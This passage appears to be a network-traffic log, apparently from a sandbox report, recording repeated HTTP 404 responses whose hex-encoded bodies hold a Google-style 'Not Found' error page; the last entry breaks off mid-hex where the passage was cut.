                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 